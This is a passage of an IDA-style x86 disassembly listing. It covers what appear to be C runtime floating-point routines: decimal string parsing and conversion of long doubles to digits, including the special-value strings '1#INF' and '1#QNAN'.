loc_42D089: ; CODE XREF: sub_42CB40+535�j
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_64]
mov [ebp+var_4], eax
loc_42D096: ; CODE XREF: sub_42CB40+547�j
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42D09B: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D572�o
mov ecx, [ebp+var_4]
sub ecx, 2
mov [ebp+var_64], ecx
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_42D0C8
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_42D0C8
mov [ebp+var_4C], 9
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42D11D
; ---------------------------------------------------------------------------
loc_42D0C8: ; CODE XREF: sub_42CB40+56B�j
; sub_42CB40+574�j
mov dl, byte ptr [ebp+var_3C]
mov [ebp+var_A4], dl
cmp [ebp+var_A4], 2Bh
jz short loc_42D107
cmp [ebp+var_A4], 2Dh
jz short loc_42D0F7
cmp [ebp+var_A4], 30h
jz short loc_42D0EE
jmp short loc_42D110
; ---------------------------------------------------------------------------
loc_42D0EE: ; CODE XREF: sub_42CB40+5AA�j
mov [ebp+var_4C], 8
jmp short loc_42D11D
; ---------------------------------------------------------------------------
loc_42D0F7: ; CODE XREF: sub_42CB40+5A1�j
mov [ebp+var_4C], 7
mov [ebp+var_74], 0FFFFFFFFh
jmp short loc_42D11D
; ---------------------------------------------------------------------------
loc_42D107: ; CODE XREF: sub_42CB40+598�j
mov [ebp+var_4C], 7
jmp short loc_42D11D
; ---------------------------------------------------------------------------
loc_42D110: ; CODE XREF: sub_42CB40+5AC�j
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_64]
mov [ebp+var_4], eax
loc_42D11D: ; CODE XREF: sub_42CB40+586�j
; sub_42CB40+5B5�j ...
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42D122: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D57A�o
mov [ebp+var_18], 1
jmp short loc_42D13C
; ---------------------------------------------------------------------------
loc_42D12B: ; CODE XREF: sub_42CB40+605�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_3C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42D13C: ; CODE XREF: sub_42CB40+5E9�j
movsx ecx, byte ptr [ebp+var_3C]
cmp ecx, 30h
jnz short loc_42D147
jmp short loc_42D12B
; ---------------------------------------------------------------------------
loc_42D147: ; CODE XREF: sub_42CB40+603�j
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_42D16B
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_42D16B
mov [ebp+var_4C], 9
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42D17B
; ---------------------------------------------------------------------------
loc_42D16B: ; CODE XREF: sub_42CB40+60E�j
; sub_42CB40+617�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_42D17B: ; CODE XREF: sub_42CB40+629�j
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42D180: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D576�o
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 31h
jl short loc_42D1A4
movsx ecx, byte ptr [ebp+var_3C]
cmp ecx, 39h
jg short loc_42D1A4
mov [ebp+var_4C], 9
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_42D1CE
; ---------------------------------------------------------------------------
loc_42D1A4: ; CODE XREF: sub_42CB40+647�j
; sub_42CB40+650�j
mov al, byte ptr [ebp+var_3C]
mov [ebp+var_A8], al
cmp [ebp+var_A8], 30h
jz short loc_42D1B8
jmp short loc_42D1C1
; ---------------------------------------------------------------------------
loc_42D1B8: ; CODE XREF: sub_42CB40+674�j
mov [ebp+var_4C], 8
jmp short loc_42D1CE
; ---------------------------------------------------------------------------
loc_42D1C1: ; CODE XREF: sub_42CB40+676�j
mov [ebp+var_4C], 0Ah
mov ecx, [ebp+var_64]
mov [ebp+var_4], ecx
loc_42D1CE: ; CODE XREF: sub_42CB40+662�j
; sub_42CB40+67F�j
jmp loc_42D343
; ---------------------------------------------------------------------------
loc_42D1D3: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D57E�o
mov [ebp+var_18], 1
mov [ebp+var_7C], 0
jmp short loc_42D1F4
; ---------------------------------------------------------------------------
loc_42D1E3: ; CODE XREF: sub_42CB40:loc_42D262�j
mov edx, [ebp+var_4]
mov al, [edx]
mov byte ptr [ebp+var_3C], al
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42D1F4: ; CODE XREF: sub_42CB40+6A1�j
cmp dword_442F58, 1
jle short loc_42D219
push 4
mov edx, [ebp+var_3C]
and edx, 0FFh
push edx
call sub_41E750
add esp, 8
mov [ebp+var_AC], eax
jmp short loc_42D236
; ---------------------------------------------------------------------------
loc_42D219: ; CODE XREF: sub_42CB40+6BB�j
mov eax, [ebp+var_3C]
and eax, 0FFh
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_AC], edx
loc_42D236: ; CODE XREF: sub_42CB40+6D7�j
cmp [ebp+var_AC], 0
jz short loc_42D267
mov eax, [ebp+var_7C]
imul eax, 0Ah
movsx ecx, byte ptr [ebp+var_3C]
lea edx, [eax+ecx-30h]
mov [ebp+var_7C], edx
cmp [ebp+var_7C], 1450h
jle short loc_42D262
mov [ebp+var_7C], 1451h
jmp short loc_42D267
; ---------------------------------------------------------------------------
loc_42D262: ; CODE XREF: sub_42CB40+717�j
jmp loc_42D1E3
; ---------------------------------------------------------------------------
loc_42D267: ; CODE XREF: sub_42CB40+6FD�j
; sub_42CB40+720�j
mov eax, [ebp+var_7C]
mov [ebp+var_14], eax
jmp short loc_42D280
; ---------------------------------------------------------------------------
loc_42D26F: ; CODE XREF: sub_42CB40+78B�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov byte ptr [ebp+var_3C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_42D280: ; CODE XREF: sub_42CB40+72D�j
cmp dword_442F58, 1
jle short loc_42D2A5
push 4
mov ecx, [ebp+var_3C]
and ecx, 0FFh
push ecx
call sub_41E750
add esp, 8
mov [ebp+var_B0], eax
jmp short loc_42D2C2
; ---------------------------------------------------------------------------
loc_42D2A5: ; CODE XREF: sub_42CB40+747�j
mov edx, [ebp+var_3C]
and edx, 0FFh
mov eax, off_442D4C
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_B0], ecx
loc_42D2C2: ; CODE XREF: sub_42CB40+763�j
cmp [ebp+var_B0], 0
jz short loc_42D2CD
jmp short loc_42D26F
; ---------------------------------------------------------------------------
loc_42D2CD: ; CODE XREF: sub_42CB40+789�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_42D343
; ---------------------------------------------------------------------------
loc_42D2DF: ; CODE XREF: sub_42CB40+D5�j
; DATA XREF: .text:0042D586�o
cmp [ebp+arg_18], 0
jz short loc_42D333
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_64], eax
mov cl, byte ptr [ebp+var_3C]
mov [ebp+var_B4], cl
cmp [ebp+var_B4], 2Bh
jz short loc_42D31B
cmp [ebp+var_B4], 2Dh
jz short loc_42D30B
jmp short loc_42D324
; ---------------------------------------------------------------------------
loc_42D30B: ; CODE XREF: sub_42CB40+7C7�j
mov [ebp+var_4C], 7
mov [ebp+var_74], 0FFFFFFFFh
jmp short loc_42D331
; ---------------------------------------------------------------------------
loc_42D31B: ; CODE XREF: sub_42CB40+7BE�j
mov [ebp+var_4C], 7
jmp short loc_42D331
; ---------------------------------------------------------------------------
loc_42D324: ; CODE XREF: sub_42CB40+7C9�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_64]
mov [ebp+var_4], edx
loc_42D331: ; CODE XREF: sub_42CB40+7D9�j
; sub_42CB40+7E2�j
jmp short loc_42D343
; ---------------------------------------------------------------------------
loc_42D333: ; CODE XREF: sub_42CB40+7A3�j
mov [ebp+var_4C], 0Ah
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_42D343: ; CODE XREF: sub_42CB40+CC�j
; sub_42CB40+D5�j ...
jmp loc_42CBE7
; ---------------------------------------------------------------------------
loc_42D348: ; CODE XREF: sub_42CB40+AB�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
cmp [ebp+var_54], 0
jz loc_42D497
cmp [ebp+var_40], 0
jnz loc_42D497
cmp [ebp+var_78], 0
jnz loc_42D497
cmp [ebp+var_70], 18h
jbe short loc_42D39F
movsx eax, [ebp+var_21]
cmp eax, 5
jl short loc_42D386
mov cl, [ebp+var_21]
add cl, 1
mov [ebp+var_21], cl
loc_42D386: ; CODE XREF: sub_42CB40+83B�j
mov [ebp+var_70], 18h
mov edx, [ebp+var_68]
sub edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
loc_42D39F: ; CODE XREF: sub_42CB40+832�j
cmp [ebp+var_70], 0
jbe loc_42D47A
mov ecx, [ebp+var_68]
sub ecx, 1
mov [ebp+var_68], ecx
jmp short loc_42D3BD
; ---------------------------------------------------------------------------
loc_42D3B4: ; CODE XREF: sub_42CB40+899�j
mov edx, [ebp+var_68]
sub edx, 1
mov [ebp+var_68], edx
loc_42D3BD: ; CODE XREF: sub_42CB40+872�j
mov eax, [ebp+var_68]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_42D3DB
mov edx, [ebp+var_70]
sub edx, 1
mov [ebp+var_70], edx
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
jmp short loc_42D3B4
; ---------------------------------------------------------------------------
loc_42D3DB: ; CODE XREF: sub_42CB40+885�j
lea ecx, [ebp+var_60]
push ecx
mov edx, [ebp+var_70]
push edx
lea eax, [ebp+var_38]
push eax
call sub_42CA00
add esp, 0Ch
cmp [ebp+var_74], 0
jge short loc_42D3FD
mov ecx, [ebp+var_14]
neg ecx
mov [ebp+var_14], ecx
loc_42D3FD: ; CODE XREF: sub_42CB40+8B3�j
mov edx, [ebp+var_14]
add edx, [ebp+var_6C]
mov [ebp+var_14], edx
cmp [ebp+var_18], 0
jnz short loc_42D415
mov eax, [ebp+var_14]
add eax, [ebp+arg_10]
mov [ebp+var_14], eax
loc_42D415: ; CODE XREF: sub_42CB40+8CA�j
cmp [ebp+var_C], 0
jnz short loc_42D424
mov ecx, [ebp+var_14]
sub ecx, [ebp+arg_14]
mov [ebp+var_14], ecx
loc_42D424: ; CODE XREF: sub_42CB40+8D9�j
cmp [ebp+var_14], 1450h
jle short loc_42D436
mov [ebp+var_40], 1
jmp short loc_42D478
; ---------------------------------------------------------------------------
loc_42D436: ; CODE XREF: sub_42CB40+8EB�j
cmp [ebp+var_14], 0FFFFEBB0h
jge short loc_42D448
mov [ebp+var_78], 1
jmp short loc_42D478
; ---------------------------------------------------------------------------
loc_42D448: ; CODE XREF: sub_42CB40+8FD�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+var_14]
push eax
lea ecx, [ebp+var_60]
push ecx
call sub_42FDD0
add esp, 0Ch
mov dx, [ebp+var_60]
mov [ebp+var_48], dx
mov eax, [ebp+var_5E]
mov [ebp+var_8], eax
mov ecx, [ebp+var_5A]
mov [ebp+var_10], ecx
mov dx, [ebp+var_56]
mov word ptr [ebp+var_50], dx
loc_42D478: ; CODE XREF: sub_42CB40+8F4�j
; sub_42CB40+906�j
jmp short loc_42D497
; ---------------------------------------------------------------------------
loc_42D47A: ; CODE XREF: sub_42CB40+863�j
mov [ebp+var_48], 0
mov word ptr [ebp+var_50], 0
mov eax, [ebp+var_50]
and eax, 0FFFFh
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
mov [ebp+var_8], ecx
loc_42D497: ; CODE XREF: sub_42CB40+814�j
; sub_42CB40+81E�j ...
cmp [ebp+var_54], 0
jnz short loc_42D4C6
mov [ebp+var_48], 0
mov word ptr [ebp+var_50], 0
mov edx, [ebp+var_50]
and edx, 0FFFFh
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
mov ecx, [ebp+var_44]
or ecx, 4
mov [ebp+var_44], ecx
jmp short loc_42D51D
; ---------------------------------------------------------------------------
loc_42D4C6: ; CODE XREF: sub_42CB40+95B�j
cmp [ebp+var_40], 0
jz short loc_42D4F1
mov word ptr [ebp+var_50], 7FFFh
mov [ebp+var_10], 80000000h
mov [ebp+var_8], 0
mov [ebp+var_48], 0
mov edx, [ebp+var_44]
or edx, 2
mov [ebp+var_44], edx
jmp short loc_42D51D
; ---------------------------------------------------------------------------
loc_42D4F1: ; CODE XREF: sub_42CB40+98A�j
cmp [ebp+var_78], 0
jz short loc_42D51D
mov [ebp+var_48], 0
mov word ptr [ebp+var_50], 0
mov eax, [ebp+var_50]
and eax, 0FFFFh
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
mov [ebp+var_8], ecx
mov edx, [ebp+var_44]
or edx, 1
mov [ebp+var_44], edx
loc_42D51D: ; CODE XREF: sub_42CB40+984�j
; sub_42CB40+9AF�j ...
mov eax, [ebp+arg_0]
mov cx, [ebp+var_48]
mov [eax], cx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+2], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
mov [ecx+6], edx
mov eax, [ebp+var_50]
and eax, 0FFFFh
mov ecx, [ebp+var_1C]
and ecx, 0FFFFh
or eax, ecx
mov edx, [ebp+arg_0]
mov [edx+0Ah], ax
mov eax, [ebp+var_44]
mov esp, ebp
pop ebp
retn
sub_42CB40 endp
; ---------------------------------------------------------------------------
off_42D55A dd offset loc_42CC1C ; DATA XREF: sub_42CB40+D5�r
dd offset loc_42CCBA
dd offset loc_42CD70
dd offset loc_42CDDB
dd offset loc_42CEF3
dd offset loc_42D025
dd offset loc_42D09B
dd offset loc_42D180
dd offset loc_42D122
dd offset loc_42D1D3
dd offset loc_42D343
dd offset loc_42D2DF
off_42D58A dd offset loc_42CD49 ; DATA XREF: sub_42CB40+1F0�r
dd offset loc_42CD37
dd offset loc_42CD40
dd offset loc_42CD5B
byte_42D59A db 0 ; DATA XREF: sub_42CB40+1EA�r
db 3
dd 1030300h, 4 dup(3030303h), 2030303h, 3030302h, 6 dup(3030303h)
dd 2030303h
db 2
off_42D5D5 dd offset loc_42CECC ; DATA XREF: sub_42CB40+37C�r
dd offset loc_42CEC3
dd offset loc_42CEDE
byte_42D5E1 db 0 ; DATA XREF: sub_42CB40+376�r
dw 2
dd 5 dup(2020202h), 1010202h, 7 dup(2020202h), 1010202h
off_42D61C dd offset loc_42CFFE ; DATA XREF: sub_42CB40+4AE�r
dd offset loc_42CFF5
dd offset loc_42D010
byte_42D628 db 0 ; DATA XREF: sub_42CB40+4A8�r
db 2, 0, 2
dd 5 dup(2020202h), 2010102h, 7 dup(2020202h), 0CC010102h
dd 3 dup(0CCCCCCCCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
push 0
push 0
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
lea eax, [ebp-0Ch]
push eax
call sub_42CB40
add esp, 1Ch
mov [ebp-14h], eax
mov ecx, [ebp+8]
push ecx
lea edx, [ebp-0Ch]
push edx
call sub_429300
add esp, 8
mov [ebp-10h], eax
cmp dword ptr [ebp-10h], 1
jnz short loc_42D6B8
mov eax, [ebp-14h]
or al, 2
mov [ebp-14h], eax
loc_42D6B8: ; CODE XREF: .text:0042D6AE�j
mov eax, [ebp-14h]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D6C0 proc near ; CODE XREF: sub_429580+36�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_52 = byte ptr -52h
var_51 = byte ptr -51h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2E = dword ptr -2Eh
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov word ptr [ebp+var_64], 4D10h
mov word ptr [ebp+var_3C], 4Dh
mov word ptr [ebp+var_60], 9Ah
mov [ebp+var_20], 134312F4h
mov [ebp+var_54], 0CCh
mov [ebp+var_53], 0CCh
mov [ebp+var_52], 0CCh
mov [ebp+var_51], 0CCh
mov [ebp+var_50], 0CCh
mov [ebp+var_4F], 0CCh
mov [ebp+var_4E], 0CCh
mov [ebp+var_4D], 0CCh
mov [ebp+var_4C], 0CCh
mov [ebp+var_4B], 0CCh
mov [ebp+var_4A], 0FBh
mov [ebp+var_49], 3Fh
mov [ebp+var_58], 1
mov ax, [ebp+arg_8]
mov word ptr [ebp+var_70], ax
mov ecx, [ebp+arg_4]
mov [ebp+var_24], ecx
mov edx, [ebp+arg_0]
mov [ebp+var_48], edx
mov eax, [ebp+var_70]
and eax, 0FFFFh
and eax, 8000h
mov word ptr [ebp+var_68], ax
mov cx, word ptr [ebp+var_70]
and cx, 7FFFh
mov word ptr [ebp+var_70], cx
mov edx, [ebp+var_68]
and edx, 0FFFFh
test edx, edx
jz short loc_42D75E
mov eax, [ebp+arg_14]
mov byte ptr [eax+2], 2Dh
jmp short loc_42D765
; ---------------------------------------------------------------------------
loc_42D75E: ; CODE XREF: sub_42D6C0+93�j
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+2], 20h
loc_42D765: ; CODE XREF: sub_42D6C0+9C�j
mov edx, [ebp+var_70]
and edx, 0FFFFh
test edx, edx
jnz short loc_42D7AC
cmp [ebp+var_24], 0
jnz short loc_42D7AC
cmp [ebp+var_48], 0
jnz short loc_42D7AC
mov eax, [ebp+arg_14]
mov word ptr [eax], 0
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+2], 20h
mov edx, [ebp+arg_14]
mov byte ptr [edx+3], 1
mov eax, [ebp+arg_14]
mov byte ptr [eax+4], 30h
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+5], 0
mov eax, 1
jmp loc_42DBD2
; ---------------------------------------------------------------------------
loc_42D7AC: ; CODE XREF: sub_42D6C0+B0�j
; sub_42D6C0+B6�j ...
mov edx, [ebp+var_70]
and edx, 0FFFFh
cmp edx, 7FFFh
jnz loc_42D8A6
mov eax, [ebp+arg_14]
mov word ptr [eax], 1
cmp [ebp+var_24], 80000000h
jnz short loc_42D7D8
cmp [ebp+var_48], 0
jz short loc_42D80C
loc_42D7D8: ; CODE XREF: sub_42D6C0+110�j
mov ecx, [ebp+var_24]
and ecx, 40000000h
test ecx, ecx
jnz short loc_42D80C
push offset a1Snan ; "1#SNAN"
mov edx, [ebp+arg_14]
add edx, 4
push edx
call sub_419FA0
add esp, 8
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 6
mov [ebp+var_58], 0
jmp loc_42D8A1
; ---------------------------------------------------------------------------
loc_42D80C: ; CODE XREF: sub_42D6C0+116�j
; sub_42D6C0+123�j
mov ecx, [ebp+var_68]
and ecx, 0FFFFh
test ecx, ecx
jz short loc_42D84C
cmp [ebp+var_24], 0C0000000h
jnz short loc_42D84C
cmp [ebp+var_48], 0
jnz short loc_42D84C
push offset a1Ind ; "1#IND"
mov edx, [ebp+arg_14]
add edx, 4
push edx
call sub_419FA0
add esp, 8
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 5
mov [ebp+var_58], 0
jmp short loc_42D8A1
; ---------------------------------------------------------------------------
loc_42D84C: ; CODE XREF: sub_42D6C0+157�j
; sub_42D6C0+160�j ...
cmp [ebp+var_24], 80000000h
jnz short loc_42D87F
cmp [ebp+var_48], 0
jnz short loc_42D87F
push offset a1Inf ; "1#INF"
mov ecx, [ebp+arg_14]
add ecx, 4
push ecx
call sub_419FA0
add esp, 8
mov edx, [ebp+arg_14]
mov byte ptr [edx+3], 5
mov [ebp+var_58], 0
jmp short loc_42D8A1
; ---------------------------------------------------------------------------
loc_42D87F: ; CODE XREF: sub_42D6C0+193�j
; sub_42D6C0+199�j
push offset a1Qnan ; "1#QNAN"
mov eax, [ebp+arg_14]
add eax, 4
push eax
call sub_419FA0
add esp, 8
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+3], 6
mov [ebp+var_58], 0
loc_42D8A1: ; CODE XREF: sub_42D6C0+147�j
; sub_42D6C0+18A�j ...
jmp loc_42DBCF
; ---------------------------------------------------------------------------
loc_42D8A6: ; CODE XREF: sub_42D6C0+FB�j
mov edx, [ebp+var_70]
and edx, 0FFFFh
sar edx, 8
mov word ptr [ebp+var_6C], dx
mov eax, [ebp+var_70]
and eax, 0FFFFh
and eax, 0FFh
mov [ebp+var_C], ax
mov ecx, [ebp+var_24]
shr ecx, 18h
mov word ptr [ebp+var_40], cx
mov edx, [ebp+var_64]
and edx, 0FFFFh
mov eax, [ebp+var_70]
and eax, 0FFFFh
imul edx, eax
mov ecx, [ebp+var_3C]
and ecx, 0FFFFh
mov eax, [ebp+var_6C]
and eax, 0FFFFh
imul ecx, eax
add edx, ecx
mov ecx, [ebp+var_60]
and ecx, 0FFFFh
mov eax, [ebp+var_40]
and eax, 0FFFFh
imul ecx, eax
add edx, ecx
sub edx, [ebp+var_20]
mov [ebp+var_8], edx
mov ecx, [ebp+var_8]
sar ecx, 10h
mov [ebp+var_5C], cx
mov dx, word ptr [ebp+var_70]
mov word ptr [ebp+var_2E], dx
mov eax, [ebp+var_24]
mov [ebp+var_32], eax
mov ecx, [ebp+var_48]
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_38], 0
push 1
movsx edx, [ebp+var_5C]
neg edx
push edx
lea eax, [ebp+var_38]
push eax
call sub_42FDD0
add esp, 0Ch
mov ecx, [ebp+var_2E]
and ecx, 0FFFFh
cmp ecx, 3FFFh
jl short loc_42D97D
mov dx, [ebp+var_5C]
add dx, 1
mov [ebp+var_5C], dx
lea eax, [ebp+var_54]
push eax
lea ecx, [ebp+var_38]
push ecx
call sub_42F990
add esp, 8
loc_42D97D: ; CODE XREF: sub_42D6C0+29F�j
mov edx, [ebp+arg_14]
mov ax, [ebp+var_5C]
mov [edx], ax
mov ecx, [ebp+arg_10]
and ecx, 1
test ecx, ecx
jz short loc_42D9D1
movsx edx, [ebp+var_5C]
mov eax, [ebp+arg_C]
add eax, edx
mov [ebp+arg_C], eax
cmp [ebp+arg_C], 0
jg short loc_42D9D1
mov ecx, [ebp+arg_14]
mov word ptr [ecx], 0
mov edx, [ebp+arg_14]
mov byte ptr [edx+2], 20h
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 1
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+4], 30h
mov edx, [ebp+arg_14]
mov byte ptr [edx+5], 0
mov eax, 1
jmp loc_42DBD2
; ---------------------------------------------------------------------------
loc_42D9D1: ; CODE XREF: sub_42D6C0+2CF�j
; sub_42D6C0+2E1�j
cmp [ebp+arg_C], 15h
jle short loc_42D9DE
mov [ebp+arg_C], 15h
loc_42D9DE: ; CODE XREF: sub_42D6C0+315�j
mov eax, [ebp+var_2E]
and eax, 0FFFFh
sub eax, 3FFEh
mov [ebp+var_2E+2], eax
mov word ptr [ebp+var_2E], 0
mov [ebp+var_44], 0
jmp short loc_42DA06
; ---------------------------------------------------------------------------
loc_42D9FD: ; CODE XREF: sub_42D6C0+358�j
mov ecx, [ebp+var_44]
add ecx, 1
mov [ebp+var_44], ecx
loc_42DA06: ; CODE XREF: sub_42D6C0+33B�j
cmp [ebp+var_44], 8
jge short loc_42DA1A
lea edx, [ebp+var_38]
push edx
call sub_42C930
add esp, 4
jmp short loc_42D9FD
; ---------------------------------------------------------------------------
loc_42DA1A: ; CODE XREF: sub_42D6C0+34A�j
cmp [ebp+var_2E+2], 0
jge short loc_42DA4C
mov eax, [ebp+var_2E+2]
neg eax
and eax, 0FFh
mov [ebp+var_74], eax
jmp short loc_42DA38
; ---------------------------------------------------------------------------
loc_42DA2F: ; CODE XREF: sub_42D6C0+38A�j
mov ecx, [ebp+var_74]
sub ecx, 1
mov [ebp+var_74], ecx
loc_42DA38: ; CODE XREF: sub_42D6C0+36D�j
cmp [ebp+var_74], 0
jle short loc_42DA4C
lea edx, [ebp+var_38]
push edx
call sub_42C990
add esp, 4
jmp short loc_42DA2F
; ---------------------------------------------------------------------------
loc_42DA4C: ; CODE XREF: sub_42D6C0+35E�j
; sub_42D6C0+37C�j
mov eax, [ebp+arg_14]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_C]
add ecx, 1
mov [ebp+var_10], ecx
jmp short loc_42DA69
; ---------------------------------------------------------------------------
loc_42DA60: ; CODE XREF: sub_42D6C0+413�j
mov edx, [ebp+var_10]
sub edx, 1
mov [ebp+var_10], edx
loc_42DA69: ; CODE XREF: sub_42D6C0+39E�j
cmp [ebp+var_10], 0
jle short loc_42DAD5
mov eax, [ebp+var_38]
mov [ebp+var_1C], eax
mov ecx, [ebp-34h]
mov [ebp+var_18], ecx
mov edx, [ebp+var_32+2]
mov [ebp+var_14], edx
lea eax, [ebp+var_38]
push eax
call sub_42C930
add esp, 4
lea ecx, [ebp+var_38]
push ecx
call sub_42C930
add esp, 4
lea edx, [ebp+var_1C]
push edx
lea eax, [ebp+var_38]
push eax
call sub_42C880
add esp, 8
lea ecx, [ebp+var_38]
push ecx
call sub_42C930
add esp, 4
mov edx, [ebp+var_2E+1]
and edx, 0FFh
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov byte ptr [ebp+var_2E+1], 0
jmp short loc_42DA60
; ---------------------------------------------------------------------------
loc_42DAD5: ; CODE XREF: sub_42D6C0+3AD�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov cl, [eax]
mov [ebp+var_28], cl
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
movsx eax, [ebp+var_28]
cmp eax, 35h
jl short loc_42DB53
jmp short loc_42DB03
; ---------------------------------------------------------------------------
loc_42DAFA: ; CODE XREF: sub_42D6C0+45F�j
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_42DB03: ; CODE XREF: sub_42D6C0+438�j
mov edx, [ebp+arg_14]
add edx, 4
cmp [ebp+var_4], edx
jb short loc_42DB21
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 39h
jnz short loc_42DB21
mov edx, [ebp+var_4]
mov byte ptr [edx], 30h
jmp short loc_42DAFA
; ---------------------------------------------------------------------------
loc_42DB21: ; CODE XREF: sub_42D6C0+44C�j
; sub_42D6C0+457�j
mov eax, [ebp+arg_14]
add eax, 4
cmp [ebp+var_4], eax
jnb short loc_42DB45
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_14]
mov ax, [edx]
add ax, 1
mov ecx, [ebp+arg_14]
mov [ecx], ax
loc_42DB45: ; CODE XREF: sub_42D6C0+46A�j
mov edx, [ebp+var_4]
mov al, [edx]
add al, 1
mov ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_42DBAC
; ---------------------------------------------------------------------------
loc_42DB53: ; CODE XREF: sub_42D6C0+436�j
jmp short loc_42DB5E
; ---------------------------------------------------------------------------
loc_42DB55: ; CODE XREF: sub_42D6C0+4B4�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_42DB5E: ; CODE XREF: sub_42D6C0:loc_42DB53�j
mov eax, [ebp+arg_14]
add eax, 4
cmp [ebp+var_4], eax
jb short loc_42DB76
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 30h
jnz short loc_42DB76
jmp short loc_42DB55
; ---------------------------------------------------------------------------
loc_42DB76: ; CODE XREF: sub_42D6C0+4A7�j
; sub_42D6C0+4B2�j
mov eax, [ebp+arg_14]
add eax, 4
cmp [ebp+var_4], eax
jnb short loc_42DBAC
mov ecx, [ebp+arg_14]
mov word ptr [ecx], 0
mov edx, [ebp+arg_14]
mov byte ptr [edx+2], 20h
mov eax, [ebp+arg_14]
mov byte ptr [eax+3], 1
mov ecx, [ebp+arg_14]
mov byte ptr [ecx+4], 30h
mov edx, [ebp+arg_14]
mov byte ptr [edx+5], 0
